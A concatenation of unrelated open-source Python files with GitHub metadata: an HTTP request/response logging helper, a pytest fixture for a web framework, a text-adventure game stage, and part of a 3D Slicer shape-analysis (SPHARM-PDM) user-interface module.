def timestamp(self) -> datetime.datetime:
if "initiated_at" in self:
# This was an outgoing request
return arrow.get(self["initiated_at"]).datetime
elif "received_at" in self:
# This was an incoming request
return arrow.get(self["received_at"]).datetime
else:
raise KeyError(
"RequestDescription missing both initiated_at and received_at"
)
yaml.add_representer(RequestDescription, Representer.represent_dict)
def describe_flask_request(request: flask.Request) -> RequestDescription:
headers = {k: v for k, v in request.headers}
info = {
"method": request.method,
"url": request.url,
"received_at": datetime.datetime.utcnow().isoformat(),
"headers": headers,
}
try:
info["json"] = request.json
except ValueError:
info["body"] = request.data.encode("utf-8")
return RequestDescription(info)
def describe_request(
req: requests.PreparedRequest, initiated_at: datetime.datetime
) -> RequestDescription:
headers = {k: v for k, v in req.headers.items()}
info = {
"method": req.method,
"url": req.url,
"initiated_at": initiated_at.isoformat(),
"headers": headers,
}
body = req.body.decode("utf-8") if req.body else None
try:
if body:
info["json"] = json.loads(body)
else:
info["body"] = body
except ValueError:
info["body"] = body
return RequestDescription(info)
class ResponseDescription(dict):
@property
def status_code(self) -> int:
return self["code"] if self.get("code") is not None else 999
@property
def reported(self) -> datetime.datetime:
return arrow.get(self["reported"]).datetime
yaml.add_representer(ResponseDescription, Representer.represent_dict)
def describe_response(resp: requests.Response) -> ResponseDescription:
headers = {k: v for k, v in resp.headers.items()}
info = {
"code": resp.status_code,
"headers": headers,
"elapsed_s": resp.elapsed.total_seconds(),
"reported": datetime.datetime.utcnow().isoformat(),
}
try:
info["json"] = resp.json()
except ValueError:
info["body"] = resp.content.decode("utf-8")
return ResponseDescription(info)
class Query(dict):
@property
def request(self) -> RequestDescription:
return coerce(self["request"], RequestDescription)
@property
def response(self) -> ResponseDescription:
return coerce(self["response"], ResponseDescription)
@property
def status_code(self) -> int:
return self.response.status_code
@property
def json_result(self) -> Optional[Dict]:
return self.response.get("json", None)
yaml.add_representer(Query, Representer.represent_dict)
def describe_query(resp: requests.Response, initiated_at: datetime.datetime) -> Query:
return Query(
{
"request": describe_request(resp.request, initiated_at),
"response": describe_response(resp),
}
)
def query_and_describe(
client: infrastructure.UTMClientSession, method: str, url: str, **kwargs
) -> Query:
req_kwargs = kwargs.copy()
req_kwargs["timeout"] = TIMEOUTS
t0 = datetime.datetime.utcnow()
try:
return describe_query(client.request(method, url, **req_kwargs), t0)
except requests.RequestException as e:
msg = "{}: {}".format(type(e).__name__, str(e))
t1 = datetime.datetime.utcnow()
# Reconstruct request similar to the one in the query (which is not
# accessible at this point)
del req_kwargs["timeout"]
req_kwargs = client.adjust_request_kwargs(req_kwargs)
req = requests.Request(method, url, **req_kwargs)
prepped_req = client.prepare_request(req)
return Query(
{
"request": describe_request(prepped_req, t0),
"response": ResponseDescription(
{
"code": None,
"failure": msg,
"elapsed_s": (t1 - t0).total_seconds(),
"reported": t1,
}
),
}
)
| {
"content_hash": "20d8e7dee7b2b29ccea6e48a3b61b8ee",
"timestamp": "",
"source": "github",
"line_count": 170,
"max_line_length": 86,
"avg_line_length": 28.370588235294118,
"alnum_prop": 0.6184947128343354,
"repo_name": "interuss/dss",
"id": "740b84b6979feaba6d8387d83ab05122a77285de",
"size": "4823",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "monitoring/monitorlib/fetch/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "518"
},
{
"name": "Dockerfile",
"bytes": "6594"
},
{
"name": "Go",
"bytes": "583387"
},
{
"name": "HTML",
"bytes": "20494"
},
{
"name": "Jsonnet",
"bytes": "601530"
},
{
"name": "Makefile",
"bytes": "10609"
},
{
"name": "PLpgSQL",
"bytes": "4759"
},
{
"name": "Python",
"bytes": "948652"
},
{
"name": "Shell",
"bytes": "76140"
}
],
"symlink_target": ""
} |
import pytest
from hypr import Hypr
from test_tools import cp_provider_factory
@pytest.fixture(scope='class')
def app(request):
app = Hypr(__name__)
for provider, urls in request.cls.providers.items():
if isinstance(provider, str):
provider = getattr(
request.module,
provider,
type(provider, (cp_provider_factory(),), {})
)
if not isinstance(urls, tuple):
urls = urls,
app.router.add_provider(provider, *urls)
app.propagate()
return app
| {
"content_hash": "dc4dee8897ce7fcc15f28a5589400697",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 60,
"avg_line_length": 22.76,
"alnum_prop": 0.5746924428822495,
"repo_name": "project-hypr/hypr",
"id": "65c471a033ce5a42c5303a3a0f6ba1c9f6b10e65",
"size": "569",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/security/checkpoint/conftest.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "144944"
}
],
"symlink_target": ""
} |
"""london_abbey.py"""
from lib.stage import Stage
class LondonAbbey(Stage):
"""London Abbey stage"""
def desc(self):
"""Describe action"""
action = """
After getting the second replicant. You search in Google and find that are
some people talking about a strange royal guard that arrests people for
telling good jokes. You take the next ship to London and get in a fancy and
old Abbey. There is no one around and a confortable silence...
"""
self.console.simulate_typing(action)
def look(self):
"""Look action"""
action = """
You look around, there are some guards and everything looks royal...
"""
self.console.simulate_typing(action)
def talk(self):
"""Talk action"""
action = """
You talk to a royal guard, but they are famous for give a shit about it...
"""
self.console.simulate_typing(action)
def joke(self):
"""Joke action"""
action = """
You drop an epic joke, almost every guard laughs...
"""
self.console.simulate_typing(action)
def fight(self):
"""Fight action"""
action = """
It's not a good idea to fight inside an abbey, so barbaric...
"""
self.console.simulate_typing(action)
| {
"content_hash": "db8026322d5e0f4adba62275cd9163c5",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 75,
"avg_line_length": 24.96,
"alnum_prop": 0.6330128205128205,
"repo_name": "brunitto/python-runner",
"id": "16a9a7062dc500f8b2708cedd6780e830ff0cafc",
"size": "1248",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/stages/london_abbey.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16067"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import os, sys
import unittest
from pathlib import Path
import vtk, qt, ctk, slicer
from slicer.ScriptedLoadableModule import *
import logging
import csv
from slicer.util import VTKObservationMixin
import platform
import time
from RigidAlignmentModule import RigidAlignmentModuleLogic
try:
import urllib.request, urllib.parse, urllib.error
except ImportError:
import urllib # python 2.x
import shutil
from CommonUtilities import *
from packaging import version
def _setSectionResizeMode(header, *args, **kwargs):
if version.parse(qt.Qt.qVersion()) < version.parse("5.0.0"):
header.setResizeMode(*args, **kwargs)
else:
header.setSectionResizeMode(*args, **kwargs)
#
# ShapeAnalysisModule
#
class ShapeAnalysisModule(ScriptedLoadableModule):
"""Uses ScriptedLoadableModule base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self, parent):
ScriptedLoadableModule.__init__(self, parent)
self.parent.title = "Shape Analysis Module"
self.parent.categories = ["SPHARM"]
self.parent.dependencies = []
self.parent.contributors = ["Laura Pascal (Kitware Inc.), Beatriz Paniagua (Kitware Inc.), Hina Shah (Kitware Inc.)"]
self.parent.helpText = """
SPHARM-PDM is a tool that computes point-based models using a parametric
boundary description for the computing of Shape Analysis.
"""
self.parent.acknowledgementText = """
This work was supported by NIH NIBIB R01EB021391
(Shape Analysis Toolbox for Medical Image Computing Projects).
"""
#
# ShapeAnalysisModuleWidget
#
class ShapeAnalysisModuleWidget(ScriptedLoadableModuleWidget):
"""Uses ScriptedLoadableModuleWidget base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def setup(self):
ScriptedLoadableModuleWidget.setup(self)
#
# Global variables
#
self.Logic = ShapeAnalysisModuleLogic()
self.progressbars_layout = None
#
# Interface
#
loader = qt.QUiLoader()
self.moduleName = 'ShapeAnalysisModule'
scriptedModulesPath = eval('slicer.modules.%s.path' % self.moduleName.lower())
scriptedModulesPath = os.path.dirname(scriptedModulesPath)
path = os.path.join(scriptedModulesPath, 'Resources', 'UI', '%s.ui' % self.moduleName)
qfile = qt.QFile(path)
qfile.open(qt.QFile.ReadOnly)
widget = loader.load(qfile, self.parent)
self.layout = self.parent.layout()
self.widget = widget
self.layout.addWidget(widget)
# Global variables of the Interface
# Group Project IO
self.CollapsibleButton_GroupProjectIO = self.getWidget('CollapsibleButton_GroupProjectIO')
self.GroupProjectInputDirectory = self.getWidget('DirectoryButton_GroupProjectInputDirectory')
self.GroupProjectOutputDirectory = self.getWidget('DirectoryButton_GroupProjectOutputDirectory')
self.Debug = self.getWidget('checkBox_Debug')
# Post Processed Segmentation
self.CollapsibleButton_SegPostProcess = self.getWidget('CollapsibleButton_SegPostProcess')
self.OverwriteSegPostProcess = self.getWidget('checkBox_OverwriteSegPostProcess')
self.label_RescaleSegPostProcess = self.getWidget('label_RescaleSegPostProcess')
self.RescaleSegPostProcess = self.getWidget('checkBox_RescaleSegPostProcess')
self.sx = self.getWidget('SliderWidget_sx')
self.sy = self.getWidget('SliderWidget_sy')
self.sz = self.getWidget('SliderWidget_sz')
self.label_sx = self.getWidget('label_sx')
self.label_sy = self.getWidget('label_sy')
self.label_sz = self.getWidget('label_sz')
self.LabelState = self.getWidget('checkBox_LabelState')
self.label_ValueLabelNumber = self.getWidget('label_ValueLabelNumber')
self.ValueLabelNumber = self.getWidget('SliderWidget_ValueLabelNumber')
# Generate Mesh Parameters
self.CollapsibleButton_GenParaMesh = self.getWidget('CollapsibleButton_GenParaMesh')
self.OverwriteGenParaMesh = self.getWidget('checkBox_OverwriteGenParaMesh')
self.NumberofIterations = self.getWidget('SliderWidget_NumberofIterations')
# Parameters to SPHARM Mesh
self.CollapsibleButton_ParaToSPHARMMesh = self.getWidget('CollapsibleButton_ParaToSPHARMMesh')
self.OverwriteParaToSPHARMMesh = self.getWidget('checkBox_OverwriteParaToSPHARMMesh')
self.SubdivLevelValue = self.getWidget('SliderWidget_SubdivLevelValue')
self.SPHARMDegreeValue = self.getWidget('SliderWidget_SPHARMDegreeValue')
self.thetaIterationValue = self.getWidget('spinBox_thetaIterationValue')
self.phiIterationValue = self.getWidget('spinBox_phiIterationValue')
self.medialMesh = self.getWidget('checkBox_medialMesh')
# Advanced Post Processed Segmentation
self.CollapsibleButton_AdvancedPostProcessedSegmentation = self.getWidget(
'CollapsibleButton_AdvancedPostProcessedSegmentation')
self.GaussianFiltering = self.getWidget('checkBox_GaussianFiltering')
self.label_VarianceX = self.getWidget('label_VarianceX')
self.VarianceX = self.getWidget('SliderWidget_VarianceX')
self.label_VarianceY = self.getWidget('label_VarianceY')
self.VarianceY = self.getWidget('SliderWidget_VarianceY')
self.label_VarianceZ = self.getWidget('label_VarianceZ')
self.VarianceZ = self.getWidget('SliderWidget_VarianceZ')
# Advanced Parameters to SPHARM Mesh
self.CollapsibleButton_AdvancedParametersToSPHARMMesh = self.getWidget(
'CollapsibleButton_AdvancedParametersToSPHARMMesh')
self.useRegTemplate = self.getWidget('checkBox_useRegTemplate')
self.label_regTemplate = self.getWidget('label_regTemplate')
self.regTemplate = self.getWidget('PathLineEdit_regTemplate')
self.useFlipTemplate = self.getWidget('checkBox_useFlipTemplate')
self.label_flipTemplate = self.getWidget('label_flipTemplate')
self.flipTemplate = self.getWidget('PathLineEdit_flipTemplate')
self.choiceOfFlip = self.getWidget('comboBox_choiceOfFlip')
self.sameFlipForAll = self.getWidget('checkBox_sameFlipForAll')
self.tableWidget_ChoiceOfFlip = self.getWidget('tableWidget_ChoiceOfFlip')
# Correspondence Improvement
self.CollapsibleButton_RigidAlignment = self.getWidget('CollapsibleButton_RigidAlignment')
self.RigidAlignmentFiducialsDirectory = self.getWidget('DirectoryButton_RigidAlignmentFiducialsDirectory')
self.RigidAlignmentEnabled = self.getWidget('checkBox_RigidAlignmentEnabled')
# Visualization
self.CollapsibleButton_Visualization = self.getWidget('CollapsibleButton_Visualization')
self.visualizationInSPV = self.getWidget('pushButton_visualizationInSPV')
self.CheckableComboBox_visualization = self.getWidget('CheckableComboBox_visualization')
self.tableWidget_visualization = self.getWidget('tableWidget_visualization')
# Apply CLIs
self.ApplyButton = self.getWidget('applyButton')
self.progress_layout = self.getWidget('progress_layout').layout()
# Connections
# Group Project IO
self.CollapsibleButton_GroupProjectIO.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_GroupProjectIO))
self.GroupProjectInputDirectory.connect('directoryChanged(const QString &)', self.onInputDirectoryChanged)
self.GroupProjectOutputDirectory.connect('directoryChanged(const QString &)', self.onOutputDirectoryChanged)
self.Debug.connect('clicked(bool)', self.onDebug)
# Post Processed Segmentation
self.CollapsibleButton_SegPostProcess.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_SegPostProcess))
self.OverwriteSegPostProcess.connect('clicked(bool)', self.onOverwriteFilesSegPostProcess)
self.RescaleSegPostProcess.connect('stateChanged(int)', self.onSelectSpacing)
self.sx.connect('valueChanged(double)', self.onSxValueChanged)
self.sy.connect('valueChanged(double)', self.onSyValueChanged)
self.sz.connect('valueChanged(double)', self.onSzValueChanged)
self.LabelState.connect('clicked(bool)', self.onSelectValueLabelNumber)
self.ValueLabelNumber.connect('valueChanged(double)', self.onLabelNumberValueChanged)
# Generate Mesh Parameters
self.CollapsibleButton_GenParaMesh.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_GenParaMesh))
self.OverwriteGenParaMesh.connect('clicked(bool)', self.onOverwriteFilesGenParaMesh)
self.NumberofIterations.connect('valueChanged(double)', self.onNumberofIterationsValueChanged)
# Parameters to SPHARM Mesh
self.CollapsibleButton_ParaToSPHARMMesh.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_ParaToSPHARMMesh))
self.OverwriteParaToSPHARMMesh.connect('clicked(bool)', self.onOverwriteFilesParaToSPHARMMesh)
self.SubdivLevelValue.connect('valueChanged(double)', self.onSubdivLevelValueChanged)
self.SPHARMDegreeValue.connect('valueChanged(double)', self.onSPHARMDegreeValueChanged)
self.thetaIterationValue.connect('valueChanged(int)', self.onThetaIterationValueChanged)
self.phiIterationValue.connect('valueChanged(int)', self.onPhiIterationValueChanged)
self.medialMesh.connect('clicked(bool)', self.onMedialMeshValueChanged)
# Advanced Post Processed Segmentation
self.CollapsibleButton_AdvancedPostProcessedSegmentation.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_AdvancedPostProcessedSegmentation))
self.GaussianFiltering.connect('clicked(bool)', self.onSelectGaussianVariance)
self.VarianceX.connect('valueChanged(double)', self.onVarianceXValueChanged)
self.VarianceY.connect('valueChanged(double)', self.onVarianceYValueChanged)
self.VarianceZ.connect('valueChanged(double)', self.onVarianceZValueChanged)
# Advanced Parameters to SPHARM Mesh
self.CollapsibleButton_AdvancedParametersToSPHARMMesh.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_AdvancedParametersToSPHARMMesh))
self.useRegTemplate.connect('clicked(bool)', self.onEnableRegTemplate)
self.regTemplate.connect('currentPathChanged(const QString)', self.onRegTemplateValueChanged)
self.useFlipTemplate.connect('clicked(bool)', self.onEnableFlipTemplate)
self.flipTemplate.connect('currentPathChanged(const QString)', self.onFlipTemplateValueChanged)
self.choiceOfFlip.connect('currentIndexChanged(int)', self.onChoiceOfFlipValueChanged)
self.sameFlipForAll.connect('clicked(bool)', self.onEnableFlipChoices)
# Correspondence Improvement
self.CollapsibleButton_RigidAlignment.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_RigidAlignment))
self.RigidAlignmentFiducialsDirectory.connect('directoryChanged(const QString &)', self.onFiducialsDirectoryChanged)
self.RigidAlignmentEnabled.connect('stateChanged(int)', self.onEnableRigidAlignment)
# Visualization
self.CollapsibleButton_Visualization.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_Visualization))
self.CheckableComboBox_visualization.connect('checkedIndexesChanged()', self.onCheckableComboBoxValueChanged)
self.visualizationInSPV.connect('clicked(bool)', self.onSPHARMMeshesVisualizationInSPV)
# Apply CLIs
self.ApplyButton.connect('clicked(bool)', self.onApplyButton)
slicer.mrmlScene.AddObserver(slicer.mrmlScene.EndCloseEvent, self.onCloseScene)
# Widget Configuration
# Table for the Flip Options
self.tableWidget_ChoiceOfFlip.setColumnCount(2)
self.tableWidget_ChoiceOfFlip.setHorizontalHeaderLabels([' Input Files ', ' Choice of Flip '])
self.tableWidget_ChoiceOfFlip.setColumnWidth(0, 400)
horizontalHeader = self.tableWidget_ChoiceOfFlip.horizontalHeader()
horizontalHeader.setStretchLastSection(False)
_setSectionResizeMode(horizontalHeader, 0, qt.QHeaderView.Stretch)
_setSectionResizeMode(horizontalHeader, 1, qt.QHeaderView.ResizeToContents)
self.tableWidget_ChoiceOfFlip.verticalHeader().setVisible(False)
# Progress Bar
self.progress_layout.addWidget(self.Logic.ProgressBar)
# Table for the visualization in SPV
self.tableWidget_visualization.setColumnCount(2)
self.tableWidget_visualization.setHorizontalHeaderLabels([' VTK Files ', ' Visualization '])
self.tableWidget_visualization.setColumnWidth(0, 400)
horizontalHeader = self.tableWidget_visualization.horizontalHeader()
horizontalHeader.setStretchLastSection(False)
_setSectionResizeMode(horizontalHeader, 0, qt.QHeaderView.Stretch)
_setSectionResizeMode(horizontalHeader, 1, qt.QHeaderView.ResizeToContents)
self.tableWidget_visualization.verticalHeader().setVisible(False)
# Configuration of the parameters of the widget
self.Logic.parameters.setTableForChoiceOfFlip(self.tableWidget_ChoiceOfFlip)
def enter(self):
if not hasattr(slicer.modules, 'shapepopulationviewer') and not hasattr(slicer.modules, 'launcher'):
messageBox = ctk.ctkMessageBox()
messageBox.setWindowTitle(' /!\ WARNING /!\ ')
messageBox.setIcon(messageBox.Warning)
messageBox.setText("Shape Population Viewer is not installed!")
messageBox.setInformativeText("In order to display the SPHARM outputs generated by Shape Analysis Module, "\
"you can install it via the extensions manager and restart 3D Slicer")
messageBox.setStandardButtons(messageBox.Ok)
messageBox.exec_()
else:
self.CollapsibleButton_Visualization.enabled = True
def onCloseScene(self, obj, event):
# Group Project IO
self.CollapsibleButton_GroupProjectIO.setChecked(True)
self.Logic.InputCases = []
self.GroupProjectInputDirectory.directory = slicer.app.slicerHome
self.GroupProjectOutputDirectory.directory = slicer.app.slicerHome
self.Debug.setChecked(False)
# Post Processed Segmentation
self.CollapsibleButton_SegPostProcess.setChecked(False)
self.OverwriteSegPostProcess.setChecked(False)
self.RescaleSegPostProcess.setChecked(True)
self.sx.setValue(0.5)
self.sy.setValue(0.5)
self.sz.setValue(0.5)
self.LabelState.setChecked(False)
self.ValueLabelNumber.setValue(0)
# Generate Mesh Parameters
self.CollapsibleButton_GenParaMesh.setChecked(False)
self.OverwriteGenParaMesh.setChecked(False)
self.NumberofIterations.setValue(1000)
# Parameters to SPHARM Mesh
self.CollapsibleButton_ParaToSPHARMMesh.setChecked(False)
self.OverwriteParaToSPHARMMesh.setChecked(False)
self.SubdivLevelValue.setValue(10)
self.SPHARMDegreeValue.setValue(15)
self.thetaIterationValue.setValue(100)
self.phiIterationValue.setValue(100)
self.medialMesh.setChecked(False)
# Advanced Post Processed Segmentation
self.CollapsibleButton_AdvancedPostProcessedSegmentation.setChecked(False)
self.GaussianFiltering.setChecked(False)
self.VarianceX.setValue(10)
self.VarianceY.setValue(10)
self.VarianceZ.setValue(10)
# Advanced Parameters to SPHARM Mesh
self.CollapsibleButton_AdvancedParametersToSPHARMMesh.setChecked(False)
self.useRegTemplate.setChecked(False)
self.regTemplate.setCurrentPath(" ")
self.useFlipTemplate.setChecked(False)
self.flipTemplate.setCurrentPath(" ")
self.choiceOfFlip.setCurrentIndex(0)
self.choiceOfFlip.enabled = True
self.sameFlipForAll.setChecked(True)
self.tableWidget_ChoiceOfFlip.enabled = False
self.tableWidget_ChoiceOfFlip.clear()
self.tableWidget_ChoiceOfFlip.setColumnCount(2)
self.tableWidget_ChoiceOfFlip.setHorizontalHeaderLabels([' Input Files ', ' Choice of Flip '])
self.tableWidget_ChoiceOfFlip.setColumnWidth(0, 400)
horizontalHeader = self.tableWidget_ChoiceOfFlip.horizontalHeader()
horizontalHeader.setStretchLastSection(False)
_setSectionResizeMode(horizontalHeader, 0, qt.QHeaderView.Stretch)
_setSectionResizeMode(horizontalHeader, 1, qt.QHeaderView.ResizeToContents)
self.tableWidget_ChoiceOfFlip.verticalHeader().setVisible(False)
# Visualization
self.CollapsibleButton_Visualization.setChecked(False)
self.CheckableComboBox_visualization.model().clear()
self.tableWidget_visualization.clear()
self.tableWidget_visualization.setColumnCount(2)
self.tableWidget_visualization.setHorizontalHeaderLabels([' VTK Files ', ' Visualization '])
self.tableWidget_visualization.setColumnWidth(0, 400)
horizontalHeader = self.tableWidget_visualization.horizontalHeader()
horizontalHeader.setStretchLastSection(False)
_setSectionResizeMode(horizontalHeader, 0, qt.QHeaderView.Stretch)
_setSectionResizeMode(horizontalHeader, 1, qt.QHeaderView.ResizeToContents)
self.tableWidget_visualization.verticalHeader().setVisible(False)
# Apply
if self.ApplyButton.text == "Cancel":
self.ApplyButton.click()
self.Logic.ProgressBar.hide()
if self.progressbars_layout:
self.CLIProgressBars.hide()
# Functions to recover the widget in the .ui file
def getWidget(self, objectName):
return self.findWidget(self.widget, objectName)
def findWidget(self, widget, objectName):
if widget.objectName == objectName:
return widget
else:
for w in widget.children():
resulting_widget = self.findWidget(w, objectName)
if resulting_widget:
return resulting_widget
return None
# Only one tab can be displayed at the same time:
# When one tab is opened all the other tabs are closed
def onSelectedCollapsibleButtonOpen(self, selectedCollapsibleButton):
if selectedCollapsibleButton.isChecked():
collapsibleButtonList = [self.CollapsibleButton_GroupProjectIO,
self.CollapsibleButton_SegPostProcess,
self.CollapsibleButton_GenParaMesh,
self.CollapsibleButton_ParaToSPHARMMesh,
self.CollapsibleButton_AdvancedPostProcessedSegmentation,
self.CollapsibleButton_AdvancedParametersToSPHARMMesh,
self.CollapsibleButton_Visualization,
self.CollapsibleButton_RigidAlignment]
for collapsibleButton in collapsibleButtonList:
collapsibleButton.setChecked(False)
selectedCollapsibleButton.setChecked(True)
#
# Group Project IO
#
def onInputDirectoryChanged(self):
inputDirectory = self.GroupProjectInputDirectory.directory
# Update of the input directory path
self.Logic.parameters.setInputDirectory(inputDirectory)
# Possible extensions
exts = [".gipl", ".gipl.gz", ".mgh", ".mgh,gz", ".nii", ".nii.gz",".nrrd", ".vtk", ".vtp", ".hdr", ".mhd"]
# Search cases and add the filename to a list
self.Logic.InputCases = []
for file in os.listdir(inputDirectory):
for ext in exts:
if file.endswith(ext):
self.Logic.InputCases.append(file)
if file.endswith(".nii") or file.endswith(".nii.gz"):
self.RescaleSegPostProcess.setCheckState(qt.Qt.Unchecked)
self.label_RescaleSegPostProcess.enabled = False
self.RescaleSegPostProcess.enabled = False
# Update of the output directory path
def onOutputDirectoryChanged(self):
outputDirectory = self.GroupProjectOutputDirectory.directory
self.Logic.parameters.setOutputDirectory(outputDirectory)
# Update of the debug parameter
def onDebug(self):
self.Logic.parameters.setDebug(self.Debug.checkState())
#
# Post Processed Segmentation
#
def onOverwriteFilesSegPostProcess(self):
# Update of the overwrite boolean for the Post Processed Segmentation step
self.Logic.parameters.setOverwriteSegPostProcess(self.OverwriteSegPostProcess.checkState())
if self.OverwriteSegPostProcess.checkState():
# Message for the user
messageBox = ctk.ctkMessageBox()
messageBox.setWindowTitle(' /!\ WARNING /!\ ')
messageBox.setIcon(messageBox.Warning)
messageBox.setText("<p align='center'>Applying the overwrite option to Post Processed Segmentation step will also apply to the next steps</p>")
messageBox.setStandardButtons(messageBox.Ok)
messageBox.exec_()
# Check the overwrite option for the next steps
self.OverwriteGenParaMesh.setCheckState(qt.Qt.Checked)
self.Logic.parameters.setOverwriteGenParaMesh(self.OverwriteGenParaMesh.checkState())
self.OverwriteParaToSPHARMMesh.setCheckState(qt.Qt.Checked)
self.Logic.parameters.setOverwriteParaToSPHARMMesh(self.OverwriteParaToSPHARMMesh.checkState())
def onSelectSpacing(self):
# Update of the rescale boolean for the Post Processed Segmentation step
self.Logic.parameters.setRescaleSegPostProcess(self.RescaleSegPostProcess.checkState())
# Enable/Disable the spacing x,y, and z parameters in the UI
self.label_sx.enabled = self.RescaleSegPostProcess.checkState()
self.label_sy.enabled = self.RescaleSegPostProcess.checkState()
self.label_sz.enabled = self.RescaleSegPostProcess.checkState()
self.sx.enabled = self.RescaleSegPostProcess.checkState()
self.sy.enabled = self.RescaleSegPostProcess.checkState()
self.sz.enabled = self.RescaleSegPostProcess.checkState()
# Update of the spacing x parameter for the Post Processed Segmentation step
def onSxValueChanged(self):
self.Logic.parameters.setSx(self.sx.value)
# Update of the spacing y parameter for the Post Processed Segmentation step
def onSyValueChanged(self):
self.Logic.parameters.setSy(self.sy.value)
# Update of the spacing z parameter for the Post Processed Segmentation step
def onSzValueChanged(self):
self.Logic.parameters.setSz(self.sz.value)
# Enable/Disable the label number value in the UI
def onSelectValueLabelNumber(self):
self.label_ValueLabelNumber.enabled = self.LabelState.checkState()
self.ValueLabelNumber.enabled = self.LabelState.checkState()
# Update of the label parameter for the Post Processed Segmentation step
def onLabelNumberValueChanged(self):
self.Logic.parameters.setLabelNumber(self.ValueLabelNumber.value)
#
# Generate Mesh Parameters
#
def onOverwriteFilesGenParaMesh(self):
# If the overwrite option for GenParaMesh is unchecked
if not self.OverwriteGenParaMesh.checkState():
# If the overwrite option for the previous step is checked, the overwrite option need to be checked for this step too
if self.OverwriteSegPostProcess.checkState():
self.OverwriteGenParaMesh.setCheckState(qt.Qt.Checked)
# Message for the user
messageBox = ctk.ctkMessageBox()
messageBox.setWindowTitle(' /!\ WARNING /!\ ')
messageBox.setIcon(messageBox.Warning)
messageBox.setText("<p align='center'>The overwrite option need to be applied to this step as it is set for the previous step</p>")
messageBox.setStandardButtons(messageBox.Ok)
messageBox.exec_()
# If the overwrite option for GenParaMesh is checked
else:
# Message for the user
messageBox = ctk.ctkMessageBox()
messageBox.setWindowTitle(' /!\ WARNING /!\ ')
messageBox.setIcon(messageBox.Warning)
messageBox.setText("<p align='center'>Applying the overwrite option to Generate Mesh Parameters step will also apply to the next steps</p>")
messageBox.setStandardButtons(messageBox.Ok)
messageBox.exec_()
# Check the overwrite option for the next step
self.OverwriteParaToSPHARMMesh.setCheckState(qt.Qt.Checked)
self.Logic.parameters.setOverwriteParaToSPHARMMesh(self.OverwriteParaToSPHARMMesh.checkState())
# Update of the overwrite boolean for the Generate Mesh Parameters step
self.Logic.parameters.setOverwriteGenParaMesh(self.OverwriteGenParaMesh.checkState())
# Update of the iterations parameter for the Generate Mesh Parameters step
def onNumberofIterationsValueChanged(self):
self.Logic.parameters.setNumberofIterations(self.NumberofIterations.value)
#
# Parameters to SPHARM Mesh
#
def onOverwriteFilesParaToSPHARMMesh(self):
# If the overwrite option for ParaToSPHARMMesh is unchecked
if not self.OverwriteParaToSPHARMMesh.checkState():
# If the overwrite option for a previous step is checked, the overwrite option need to be checked for this step too
if self.OverwriteSegPostProcess.checkState() or self.OverwriteGenParaMesh.checkState():
self.OverwriteParaToSPHARMMesh.setCheckState(qt.Qt.Checked)
# Message for the user
messageBox = ctk.ctkMessageBox()
messageBox.setWindowTitle(' /!\ WARNING /!\ ')
messageBox.setIcon(messageBox.Warning)
messageBox.setText("<p align='center'>The overwrite option need to be applied to this step as it is set for the previous step</p>")
messageBox.setStandardButtons(messageBox.Ok)
messageBox.exec_()
# Update of the overwrite boolean for the Parameters to SPHARM Mesh step
self.Logic.parameters.setOverwriteParaToSPHARMMesh(self.OverwriteParaToSPHARMMesh.checkState())
# Update of the sub-division parameter for the Parameters to SPHARM Mesh step
def onSubdivLevelValueChanged(self):
self.Logic.parameters.setSubdivLevelValue(self.SubdivLevelValue.value)
# Update of the SPHARM degree parameter for the Parameters to SPHARM Mesh step
def onSPHARMDegreeValueChanged(self):
self.Logic.parameters.setSPHARMDegreeValue(self.SPHARMDegreeValue.value)
# Update of the theta iteration parameter for the Parameters to SPHARM Mesh step
def onThetaIterationValueChanged(self):
self.Logic.parameters.setThetaIterationValue(self.thetaIterationValue.value)
# Update of the phi iteration parameter for the Parameters to SPHARM Mesh step
def onPhiIterationValueChanged(self):
self.Logic.parameters.setPhiIterationValue(self.phiIterationValue.value)
# Update of the medial mesh boolean for the Parameters to SPHARM Mesh step
def onMedialMeshValueChanged(self):
self.Logic.parameters.setMedialMesh(self.medialMesh.checkState())
#
# Advanced Post Processed Segmentation
#
def onSelectGaussianVariance(self):
# Update of the gaussian variance boolean for the Post Processed Segmentation step
self.Logic.parameters.setGaussianFiltering(self.GaussianFiltering.checkState())
# Enable/Disable the gaussian variance parameters in the UI
self.label_VarianceX.enabled = self.GaussianFiltering.checkState()
self.VarianceX.enabled = self.GaussianFiltering.checkState()
self.label_VarianceY.enabled = self.GaussianFiltering.checkState()
self.VarianceY.enabled = self.GaussianFiltering.checkState()
self.label_VarianceZ.enabled = self.GaussianFiltering.checkState()
self.VarianceZ.enabled = self.GaussianFiltering.checkState()
# Update of the variance x parameter for the Post Processed Segmentation step
def onVarianceXValueChanged(self):
self.Logic.parameters.setVarianceX(self.VarianceX.value)
# Update of the variance y parameter for the Post Processed Segmentation step
def onVarianceYValueChanged(self):
self.Logic.parameters.setVarianceY(self.VarianceY.value)
# Update of the variance z parameter for the Post Processed Segmentation step
def onVarianceZValueChanged(self):
self.Logic.parameters.setVarianceZ(self.VarianceZ.value)
#
# Advanced Parameters to SPHARM Mesh
#
def onEnableRegTemplate(self):
# Update of the registration template boolean for the Parameters to SPHARM Mesh step
